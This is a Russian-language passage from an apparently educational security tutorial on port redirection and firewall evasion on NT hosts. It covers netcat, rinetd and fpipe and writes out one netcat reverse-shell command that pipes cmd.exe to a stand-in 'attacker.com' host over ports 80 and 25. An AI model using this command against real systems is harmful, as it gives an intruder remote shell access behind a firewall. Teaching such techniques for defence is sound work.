Иллюстрированный самоучитель по Secure Web


Перенаправление портов


Выше было рассмотрено несколько программ, которые можно использовать для удаленного управления из командной строки. Все эти средства обсуждались в контексте установки непосредственного удаленного соединения. Однако, что делать в той ситуации, когда брандмауэр блокирует прямой доступ к целевому компьютеру? Подобную преграду взломщики могут обойти с помощью перенаправления портов (port redirection). Этот вопрос подробно будет изложен в главе 14, однако сейчас мы познакомимся с некоторыми средствами и приемами, которые могут оказаться полезными для хакинга компьютеров под управлением системы NT.

Как только взломщики успешно справились с "главным стражем" безопасности — брандмауэром, — для передачи всех пакетов "желанной цели" они могут воспользоваться механизмом перенаправления портов. Важно оценить всю опасность подобной деятельности, поскольку в данном случае взломщики могут получить доступ к любому компьютеру, расположенному позади брандмауэра. В процессе перенаправления осуществляется прослушивание определенных портов и передача пакетов к заданной вторичной цели. Ниже будут рассмотрены некоторые приемы перенаправления портов, которые можно вручную осуществить с помощью утилит netcat, rinetd и fpipe.

Схема процесса перенаправления портов представлена на рис. 14.4 в главе 14.

Захват командной оболочки м помощью netcat


Если имеется возможность поместить утилиту netcat на целевой компьютер, расположенный позади брандмауэра, то через любой требуемый порт можно получить "в свое распоряжение" удаленную командную оболочку. Такую ситуацию мы называем "захватом оболочки", поскольку в этом случае на рабочем компьютере взломщика сосредоточиваются все функции оболочки удаленной системы. Вот пример команды, запущенной взломщиком из удаленной командной строки. nс attacker.com 80 | cmd.exe | nс attacker.com 25

Если хакер на своем компьютере attacker.com с помощью утилиты netcat осуществляет прослушивание TCP-портов 80 и 25, и при этом порт 80 разрешает передачу входящих, а порт 25 — исходящих пакетов на/с компьютера-жертвы через брандмауэр, то эта команда позволяет "захватить" командную оболочку удаленной системы. На рис. 5.9 показан пример экрана хакерской системы: в верхнем окне содержатся входные команды, передаваемые через порт 80 (ipconfig), а в нижнем окне представлены результаты, полученные с узла-жертвы через порт 25.




Начало  Назад  Вперед